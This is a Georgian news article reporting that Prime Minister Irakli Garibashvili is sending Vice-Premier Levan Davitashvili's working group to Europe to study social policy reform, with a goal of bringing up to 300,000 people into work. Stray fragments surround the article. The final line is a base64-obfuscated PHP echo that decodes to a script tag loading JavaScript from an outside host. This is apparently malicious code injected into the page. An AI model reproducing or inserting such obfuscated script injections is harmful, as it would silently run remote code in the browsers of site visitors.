celsiusi
ავერსი შნაიდერი
პრემიერ-მინისტრი ირაკლი ღარიბაშვილი ვიცე-პრემიერ ლევან დავითაშვილს სოციალური პოლიტიკის რეფორმის საუკეთესო გამოცდილების გაზიარებისთვის ევროპაში გზავნის.
 
"დეკემბრის დასაწყისში, სამუშაო ჯგუფი, ვიცე-პრემიერ ლევან დავითაშვილის ხელმძღვანელობით, ევროპის რამდენიმე ქვეყანაში გაემგზავრება, ჩვენ გვექნება ინტენსიური მუშაობა და ჩამოვიტანთ საუკეთესო გამოცდილებას ევროპიდან, ვინც სოციალური პოლიტიკის რეფორმა განახორციელა", - ამის შესახებ საქართველოს პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა მთავრობის დღევანდელ სხდომაზე განაცხადა. 
 
საქმე ეხება არსებული სოციალური პოლიტიკის ცვლილებას, რომლის თანახმად, მთავრობა 300 000-მდე შრომისუნარიანი მოქალაქეების "ამუშავებას" გეგმავს. რეფორმაზე მომუშავე ჯგუფს ვიცე-პრემიერი, გარემოს დაცვის და სოფლის მეურნეობის მინისტრი ლევან დავითაშვილი ხელმძღვანელობს.
 
„რაც შეეხება სოციალურ პოლიტიკას, დეკემბრის დასაწყისში, სამუშაო ჯგუფი, ბატონ ლევან დავითაშვილის ხელმძღვანელობით ევროპის რამდენიმე ქვეყანაში გაემგზავრება. ჩვენ გვექნება ინტენსიური მუშაობა, ჩამოვიტანთ საუკეთესო გამოცდილებას ევროპიდან, ვინც გააკეთა აღნიშნული სოციალური პოლიტიკის რეფორმა და ვფიქრობ, ესეც სასარგებლო იქნება ჩვენი ქვეყნისა და ჩვენი მოსახლეობისთვის“, - აღნიშნა პრემიერმა.
1066
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");